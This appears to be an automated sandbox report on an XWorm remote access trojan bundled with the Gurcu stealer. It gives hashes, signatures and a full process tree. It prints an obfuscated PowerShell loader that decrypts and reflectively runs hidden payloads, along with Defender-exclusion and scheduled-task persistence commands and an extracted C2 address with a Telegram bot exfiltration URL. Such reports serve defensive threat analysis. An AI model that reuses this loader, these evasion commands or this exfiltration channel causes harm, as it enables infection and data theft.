Overview

overview

10

Static

static

3

Svhost2.exe

windows7-x64

1

Svhost2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-08-2024 03:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Svhost2.exe

  • Size

    36.2MB

  • MD5

    60a9e5320e3fe7aefbff72bca88ccbf0

  • SHA1

    65af43eb84c187d834d1e0113f1aa7f0b82fcadd

  • SHA256

    8da2637a9b0a05e0f4658527e1571bb18b14a3ba6934658150d796d85d032480

  • SHA512

    04581124c8bae3ce7a3bef059d3296ac7d7b994af501de0ab29b94094dd5683df500914676d13204f29cd61eef8bcdb36f149f582fddd890d33cd014ba96c359

  • SSDEEP

    393216:31Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYft:3Mguj8Q4VfvsqFTrYH

Score
10/10
gurcuxwormexecutionpersistenceratstealertrojan

Malware Config

Extracted

Family

xworm

C2

147.185.221.21:57819

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot6863578083:AAGRiPUfgfiDpbqzNp6a_eWtUpxWtlGT2AA/sendMessage?chat_id=6237826260

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6863578083:AAGRiPUfgfiDpbqzNp6a_eWtUpxWtlGT2AA/sendMessage?chat_id=6237826260

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 15 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:796
    • C:\Windows\system32\backgroundTaskHost.exe
      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
      2⤵
        PID:1324
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:900
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:956
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:512
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:432
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1044
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1052
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                  1⤵
                    PID:1088
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1188
                    • C:\Users\Admin\AppData\Roaming\Svhost
                      C:\Users\Admin\AppData\Roaming\Svhost
                      2⤵
                      • Executes dropped EXE
                      PID:1892
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1232
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1280
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1368
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1408
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1416
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1476
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1504
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1524
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1620
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1696
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1704
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1796
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1808
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              1⤵
                                                PID:1920
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1984
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1992
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1520
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                        PID:1676
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2184
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                          1⤵
                                                            PID:2208
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2284
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2448
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2456
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2692
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2724
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2800
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2812
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2824
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:3060
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3324
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3332
                                                                              • C:\Users\Admin\AppData\Local\Temp\Svhost2.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\Svhost2.exe"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4048
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd.exe /d /c call C:\Users\Admin\AppData\Local\Temp\0l810b.bat
                                                                                  3⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3588
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net file
                                                                                    4⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4880
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 file
                                                                                      5⤵
                                                                                        PID:5036
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YvgrXpsl+t//eCtGoYbRqilS5hXfnRrg0c/aeW/EwJ4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xG9XlekfxFVf1BjZK9/53g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAvkd=New-Object System.IO.MemoryStream(,$param_var); $PKlwv=New-Object System.IO.MemoryStream; $AdYmg=New-Object System.IO.Compression.GZipStream($WAvkd, [IO.Compression.CompressionMode]::Decompress); $AdYmg.CopyTo($PKlwv); $AdYmg.Dispose(); $WAvkd.Dispose(); $PKlwv.Dispose(); $PKlwv.ToArray();}function execute_function($param_var,$param2_var){ $Hhsdl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JtcqQ=$Hhsdl.EntryPoint; $JtcqQ.Invoke($null, $param2_var);}$PtruM = 'C:\Users\Admin\AppData\Local\Temp\0l810b.bat';$host.UI.RawUI.WindowTitle = $PtruM;$zfZHV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PtruM).Split([Environment]::NewLine);foreach ($QhBXD in $zfZHV) { if ($QhBXD.StartsWith('lAAEqthHxAMRpRCztSzl')) { $UXwoD=$QhBXD.Substring(20); break; }}$payloads_var=[string[]]$UXwoD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      4⤵
                                                                                        PID:1628
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3272
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_374_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_374.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:808
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_374.vbs"
                                                                                          5⤵
                                                                                          • Checks computer location settings
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2512
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_374.bat" "
                                                                                            6⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1948
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net file
                                                                                              7⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3476
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 file
                                                                                                8⤵
                                                                                                  PID:3608
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YvgrXpsl+t//eCtGoYbRqilS5hXfnRrg0c/aeW/EwJ4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xG9XlekfxFVf1BjZK9/53g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAvkd=New-Object System.IO.MemoryStream(,$param_var); $PKlwv=New-Object System.IO.MemoryStream; $AdYmg=New-Object System.IO.Compression.GZipStream($WAvkd, [IO.Compression.CompressionMode]::Decompress); $AdYmg.CopyTo($PKlwv); $AdYmg.Dispose(); $WAvkd.Dispose(); $PKlwv.Dispose(); $PKlwv.ToArray();}function execute_function($param_var,$param2_var){ $Hhsdl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JtcqQ=$Hhsdl.EntryPoint; $JtcqQ.Invoke($null, $param2_var);}$PtruM = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_374.bat';$host.UI.RawUI.WindowTitle = $PtruM;$zfZHV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PtruM).Split([Environment]::NewLine);foreach ($QhBXD in $zfZHV) { if ($QhBXD.StartsWith('lAAEqthHxAMRpRCztSzl')) { $UXwoD=$QhBXD.Substring(20); break; }}$payloads_var=[string[]]$UXwoD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                7⤵
                                                                                                  PID:3228
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                  7⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops startup file
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2584
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                    8⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:1084
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                    8⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:1360
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Svhost'
                                                                                                    8⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4184
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Svhost'
                                                                                                    8⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:5076
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svhost" /tr "C:\Users\Admin\AppData\Roaming\Svhost"
                                                                                                    8⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:4744
                                                                                                  • C:\Windows\SYSTEM32\CMD.EXE
                                                                                                    "CMD.EXE"
                                                                                                    8⤵
                                                                                                      PID:3604
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3500
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:3984
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:1116
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:3884
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:60
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4712
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                  1⤵
                                                                                                    PID:2236

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    661739d384d9dfd807a089721202900b

                                                                                                    SHA1

                                                                                                    5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                    SHA256

                                                                                                    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                    SHA512

                                                                                                    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                    Filesize

                                                                                                    53KB

                                                                                                    MD5

                                                                                                    a26df49623eff12a70a93f649776dab7

                                                                                                    SHA1

                                                                                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                    SHA256

                                                                                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                    SHA512

                                                                                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    9c360589ecf6d472692680f73445f2b0

                                                                                                    SHA1

                                                                                                    e6f95eaa97f6a3de212dd1d4cad103e5f7708b3d

                                                                                                    SHA256

                                                                                                    267aa84afe3f6ea4d6afa6168f1a918dfe62ba2e8b29704789e2b7ff0e3ce2f8

                                                                                                    SHA512

                                                                                                    1f3aaf519c9755c639dbec25dca18db36977926c334d4ca7dcf6dd1137655983c2ab030f0459793372a1886c3c886fe5233a74bb27d42d450c947486cd5832c9

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    12c844ed8342738dacc6eb0072c43257

                                                                                                    SHA1

                                                                                                    b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

                                                                                                    SHA256

                                                                                                    2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

                                                                                                    SHA512

                                                                                                    e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                    Filesize

                                                                                                    944B

                                                                                                    MD5

                                                                                                    d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                    SHA1

                                                                                                    157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                    SHA256

                                                                                                    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                    SHA512

                                                                                                    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                    Filesize

                                                                                                    944B

                                                                                                    MD5

                                                                                                    60945d1a2e48da37d4ce8d9c56b6845a

                                                                                                    SHA1

                                                                                                    83e80a6acbeb44b68b0da00b139471f428a9d6c1

                                                                                                    SHA256

                                                                                                    314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

                                                                                                    SHA512

                                                                                                    5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                    Filesize

                                                                                                    944B

                                                                                                    MD5

                                                                                                    b1a1d8b05525b7b0c5babfd80488c1f2

                                                                                                    SHA1

                                                                                                    c85bbd6b7d0143676916c20fd52720499c2bb5c6

                                                                                                    SHA256

                                                                                                    adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

                                                                                                    SHA512

                                                                                                    346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0l810b.bat
                                                                                                    Filesize

                                                                                                    315KB

                                                                                                    MD5

                                                                                                    0b636b5f877f8c0f6fac84038c72f62f

                                                                                                    SHA1

                                                                                                    e7b2385f36fce6b16e6f6ac7c68b1334eee821c2

                                                                                                    SHA256

                                                                                                    153ec0e1858879880beb4823db72dec4c363917e06114e8e07cbfbc5970a17f1

                                                                                                    SHA512

                                                                                                    215aedbba01336a9219abfc46488295e33e4ea3e815312489e8e7fe0d2695c88d0dae7dc13390b5be517f68fed1de86e17a48fef2d8b3295782229e1ea112cc0

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gwrfrz1s.pt5.ps1
                                                                                                    Filesize

                                                                                                    60B

                                                                                                    MD5

                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                    SHA1

                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                    SHA256

                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                    SHA512

                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_374.vbs
                                                                                                    Filesize

                                                                                                    124B

                                                                                                    MD5

                                                                                                    1490248f3e900dca6aee442a3186dc7e

                                                                                                    SHA1

                                                                                                    7839e0c6a1378489bd2a5a45de946a5dff86dcd5

                                                                                                    SHA256

                                                                                                    62cd6757c6d564e5a17e9d830e670cd9895a7b6d14fa632e7f0055900c7d3bea

                                                                                                    SHA512

                                                                                                    c6f8e7177abf6e7b20c3104ba33afb545f9ab1871708d341f7215bbf9605048a58f90eb44e297169861e063319db4c324a5c3a6418007e333066d8119f91f9a9

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Roaming\Svhost
                                                                                                    Filesize

                                                                                                    442KB

                                                                                                    MD5

                                                                                                    04029e121a0cfa5991749937dd22a1d9

                                                                                                    SHA1

                                                                                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                    SHA256

                                                                                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                    SHA512

                                                                                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                    Download Submit

                                                                                                  • memory/512-101-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/900-90-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/956-62-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1052-102-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1088-89-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1116-72-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1280-93-0x00007FFA8F030000-0x00007FFA8F040000-memory.dmp

                                                                                                    Filesize

